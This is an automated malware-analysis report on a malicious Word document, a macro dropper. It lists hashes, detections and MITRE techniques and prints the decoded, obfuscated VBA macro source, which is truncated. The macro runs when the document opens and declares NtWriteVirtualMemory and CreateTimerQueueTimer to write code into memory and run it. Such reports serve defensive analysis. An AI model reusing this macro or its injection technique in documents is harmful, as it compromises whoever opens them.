Office (OLE) malware analysis — malicious · 106fcd233b12b9e7

MALICIOUS

Office (OLE)

204.5 KB Created: 2017-11-13 14:35:00 Authoring application: Microsoft Office Word First seen: 2017-11-20

MD5: d6222c76176eaa9c7916f9e02af9ea68 SHA-1: 8770153eff8682d658c665dfcde212e1d2eb340a SHA-256: 106fcd233b12b9e79dc6b87b62f28005f45baba2a4c460d6fc1a82fbdf8f3b45

142 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, specifically a Document_Open macro designed to execute malicious code. Heuristics indicate a lure to enable macros and a critical ClamAV detection for 'Doc.Dropper.Agent-6373353-0'. The VBA code appears to be obfuscated but includes API declarations for functions like 'CreateTimerQueueTimer' and 'NtWriteVirtualMemory', suggesting capabilities for payload execution or manipulation. The primary function of this document is to act as a dropper for further malicious activity.

Heuristics 5

ClamAV: Doc.Dropper.Agent-6373353-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6373353-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12233 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12233 bytes
SHA-256: `fc0d84e12ea7775ea56124ec815d454d8587218feee0174778ffc88738b36c34`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub add() With ActiveDocument.Sections(1).Headers(wdHeaderFooterPrimary) _ .PageNumbers .IncludeChapterNumber = True .ChapterPageSeparator = wdSeparatorEnDash End With End Sub Private Sub Document_Open() Dim alexipharmic As Integer Dim crucially As Integer chagrin = "nonprevalence" corels.quintroon anus = 110 + 5 Pmt 0, anus, 33435, 41854, 8 End Sub Attribute VB_Name = "quit" ' Stirb nicht #If (13 * 3 + 5) > (8 - 3 * 1) And Not (88 - 11 * 8) * 30 < (Win64) Then ' I dont know who he is ' Es ist kalt und regungslos Public Declare Function fiduciary Lib "Kernel32" Alias _ "CreateTimerQueueTimer" (comptes As Any, ByVal saponaria As Any, ByVal sully As Any, ByVal closepacked As Any, ByVal ayrshire As Any, ByVal stateoftheart As Any, ByVal laudator As Any) As Long ' Es ist kalt und regungslos ' irgendwer mich liebt Public Declare Function alternator _ Lib "Ntdll " Alias _ "NtWriteVirtualMemory" (ByVal carpetbag As Any, ByVal exploit As Any, ByVal electrode As Any, ByVal mantoman As Any, ByVal baguet As Any) As Long ' I know that you exist ' Ich warte hier Public Declare Function ballast Lib "Shlwapi.dll " Alias "SleepConditionVariableSRW" (ByVal backwardation As Any, tyrannid As Any, auro As Any, glomerular As Any) As Long ' Es ist kalt und regungslos ' Your love I can't dismiss #End If ' Ich warte hier ' His passion is a kiss #If (13 * 3 + 5) > (8 - 3 * 1) And (88 - 11 * 8) * 30 < (Win64) Then ' Doch ich weiГџ dass es dich gibt ' Your love I can't dismiss Public Declare PtrSafe Function gossamer Lib "Shlwapi.dll " Alias "SleepConditionVariableSRW" (ByVal melic As Any, agape As Any, bellarmine As Any, earl As Any) As LongPtr ' Stirb nicht ' Dont die before I do Public Declare PtrSafe Function fiduciary Lib "Kernel32" Alias "CreateTimerQueueTimer" (surmise As Any, ByVal dietetic As Any, ByVal luscinia As Any, ByVal botryoid As Any, ByVal grus As Any, ByVal reject As Any, ByVal coed As Any) As Long ' Doch ich weiГџ dass es dich gibt ' Your love I can't dismiss #End If ' I dont know who you are ' Stirb nicht ' Ich warte hier Attribute VB_Name = "saviour" Attribute VB_Base = "0{6A1B990E-2DD0-4886-AC4B-EE2678711C61}{4D6D69BB-8F54-45C7-BA1F-D261A2E56541}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "corels" Function springcleaning(extrusion, majestic, cerumen) #If (7 * 4 + 5) > (7 - 2 * 1) And (20 - 5 * 4) * 2 < (Win64) Then Dim espri As String Dim dross As Long Dim dissipate As LongPtr Dim galled As LongPtr Dim forum As LongPtr Dim aleyrodidae As Variant Dim infandum As LongPtr Dim diable As LongPtr #ElseIf (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then Dim galled As Long Dim amphitheatric As String Dim dissipate As Long Dim hindquarters As Variant Dim infandum As Long Dim kit As Variant Dim forum As Long Dim basidiomycota As Variant Dim diable As Long Dim groupware As Byte Dim ateleiotic As Long #End If transaminase = Rnd(132) spilogale = alcedo galled = extrusion diable = cerumen transaminase = Math.Round(272) infandum = majestic clogging = 4 + 4 Pmt 0, clogging, 26049, 36158, 7 alcedo = spilogale dissipate = 43 - 13 - 31 alternator ByVal dissipate, galled, infandum, diable, forum alcedo = "nervousness" End Function Function boycott(abolish) Dim psychopomp As Variant Dim anorthitic As String Dim arnica As Variant Dim botrychium As Integer #If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then Dim deconsecrate As Long Dim rhymed As LongPtr dipus = 107 - 1 - 98 Dim incurability As LongPtr Dim newport As Byte ... (truncated)

SHA-256: fc0d84e12ea7775ea56124ec815d454d8587218feee0174778ffc88738b36c34

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Sub add()
With ActiveDocument.Sections(1).Headers(wdHeaderFooterPrimary) _
.PageNumbers
.IncludeChapterNumber = True
.ChapterPageSeparator = wdSeparatorEnDash
End With
End Sub

Private Sub Document_Open()
Dim alexipharmic As Integer
Dim crucially As Integer
chagrin = "nonprevalence"
corels.quintroon
anus = 110 + 5
 Pmt 0, anus, 33435, 41854, 8
End Sub

Attribute VB_Name = "quit"
'  Stirb nicht
#If (13 * 3 + 5) > (8 - 3 * 1) And Not (88 - 11 * 8) * 30 < (Win64) Then
'  I dont know who he is
'  Es ist kalt und regungslos
Public Declare Function fiduciary Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (comptes As Any, ByVal saponaria As Any, ByVal sully As Any, ByVal closepacked As Any, ByVal ayrshire As Any, ByVal stateoftheart As Any, ByVal laudator As Any) As Long
'  Es ist kalt und regungslos
'  irgendwer mich liebt
Public Declare Function alternator _
Lib "Ntdll   " Alias _
"NtWriteVirtualMemory" (ByVal carpetbag As Any, ByVal exploit As Any, ByVal electrode As Any, ByVal mantoman As Any, ByVal baguet As Any) As Long
'  I know that you exist
'  Ich warte hier
Public Declare Function ballast Lib "Shlwapi.dll  " Alias "SleepConditionVariableSRW" (ByVal backwardation As Any, tyrannid As Any, auro As Any, glomerular As Any) As Long
'  Es ist kalt und regungslos
'  Your love I can't dismiss
#End If
'  Ich warte hier
'  His passion is a kiss
#If (13 * 3 + 5) > (8 - 3 * 1) And (88 - 11 * 8) * 30 < (Win64) Then
'  Doch ich weiГџ dass es dich gibt
'  Your love I can't dismiss
Public Declare PtrSafe Function gossamer Lib "Shlwapi.dll  " Alias "SleepConditionVariableSRW" (ByVal melic As Any, agape As Any, bellarmine As Any, earl As Any) As LongPtr
'  Stirb nicht
'  Dont die before I do
Public Declare PtrSafe Function fiduciary Lib "Kernel32" Alias "CreateTimerQueueTimer" (surmise As Any, ByVal dietetic As Any, ByVal luscinia As Any, ByVal botryoid As Any, ByVal grus As Any, ByVal reject As Any, ByVal coed As Any) As Long
'  Doch ich weiГџ dass es dich gibt
'  Your love I can't dismiss
#End If
'  I dont know who you are

'  Stirb nicht
'  Ich warte hier


Attribute VB_Name = "saviour"
Attribute VB_Base = "0{6A1B990E-2DD0-4886-AC4B-EE2678711C61}{4D6D69BB-8F54-45C7-BA1F-D261A2E56541}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "corels"
Function springcleaning(extrusion, majestic, cerumen)
#If (7 * 4 + 5) > (7 - 2 * 1) And (20 - 5 * 4) * 2 < (Win64) Then
Dim espri As String
Dim dross As Long
Dim dissipate As LongPtr
Dim galled As LongPtr
Dim forum As LongPtr
Dim aleyrodidae As Variant
Dim infandum As LongPtr
Dim diable As LongPtr
#ElseIf (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim galled As Long
Dim amphitheatric As String
Dim dissipate As Long
Dim hindquarters As Variant
Dim infandum As Long
Dim kit As Variant
Dim forum As Long
Dim basidiomycota As Variant
Dim diable As Long
Dim groupware As Byte
Dim ateleiotic As Long
#End If
transaminase = Rnd(132)
spilogale = alcedo
galled = extrusion
diable = cerumen
transaminase = Math.Round(272)
infandum = majestic
clogging = 4 + 4
Pmt 0, clogging, 26049, 36158, 7
alcedo = spilogale
dissipate = 43 - 13 - 31
alternator ByVal dissipate, galled, infandum, diable, forum
alcedo = "nervousness"
End Function

Function boycott(abolish)
Dim psychopomp As Variant
Dim anorthitic As String
Dim arnica As Variant
Dim botrychium As Integer
#If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then
Dim deconsecrate As Long
Dim rhymed As LongPtr
dipus = 107 - 1 - 98
Dim incurability As LongPtr
Dim newport As Byte
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.